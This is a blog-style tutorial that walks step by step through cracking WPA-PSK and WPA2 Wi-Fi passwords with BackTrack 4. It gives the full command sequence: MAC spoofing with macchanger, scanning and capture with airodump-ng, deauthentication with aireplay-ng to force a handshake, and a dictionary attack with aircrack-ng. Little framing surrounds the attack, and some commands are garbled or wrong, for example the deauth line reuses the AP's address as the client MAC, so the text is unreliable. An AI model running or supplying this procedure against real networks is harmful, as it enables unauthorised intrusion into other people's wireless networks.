How to Cracking WPA-PSK and WPA-2 with BackTrack 4 Beta

The mechanics of cracking WPA is simple and straightforward, the biggest drawback is that you must have the password in your dictionary file after you capture the handshake and there must be a computer connected to the AP you want to compromise. I am using and HP Pavilion Laptop with a Raylink wireless USB antenna, I booted Bactrack 4 from CD and I am eady to begin.

First I have to stop the wireless card so I can manipulate some settings.

airmon-ng stop wlan0

(wlan0 is my wireless USB atenna), if I am usnsure what devices I have I would run

ifconfig -a

to show me all available NIC's

Now down the wireless card by typing

ifconfig wlan0 down

I am now ready to assign a fake mac address to my USB device

macchanger - - mac 00:11:22:33:44:55

I can use any mac address as long as its valid in length and characters this one is simply easy to use.

Next you must identify the bssid and channel of the AP you want to crack

airodump-ng wlan0

This will show you all AP within the range of your wireless card. The screen will look something like

BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
00:1C:58:AE:C3:01 -60 124 1 0 1 54 WPA2 CCMP PSK Network

BSSID Station PWR Rate Lost Packets Probe
00:1C:58:AE:C3:01 00:1B:66:AD:C6:00 -57 0- 1 48 Network

You will need the bssid and channel to proceed to the next step

airodump-ng -c 1 -w wpa1 - - bssid 00:1C:58:AE:C3:01 wlan0

This command starts monitoring traffic on the specific AP and writes the information collected to a file, in this example the file is called wpa1. This file is used in aircrack to decrypt the actual password

Now open a new shell and we are ready to caputre the handshake between a workstation and the AP.

aireplay-ng -0 10 -bssid 00:1C:58:AE:C3:01 -c 00:1C:58:AE:C3:01 wlan0

This command sends a reinjection of deauth packet to the AP and will force a new handshake between the workstation and the AP. When you capture it your airodump screen with show a message across the top saying it has the Handshake.

Now you are ready to crack the password, you can now stop both the airodump and aireplay shells and open a final new shell. By default BackTrack 4 has a dictionary file you can use though I suggest modifing it with additional passwords for a more feature rich attack. It is located under /pentest/wireless/cowpatty and is named dict. You can navigate to it using Konqueror or via command line Now in your new console type in

aircrack-ng wpa1 -w /pentest/wireless/cowpatty/dict

Now if you have the pasword in your dict file it will only take a few moments for the crack and the password to be show on screen.

Many AP now change passwords every hour others have WPA keys with very high encryption values and make it extremely difficult to crack. Bottom line if your a company and you have WPA using very high encryption values this make it almost impossible to crack unless a professional has hours and hours of time and a dict file hundreds of megabytes in size.

Anda Sudah Baca Yang Ini? :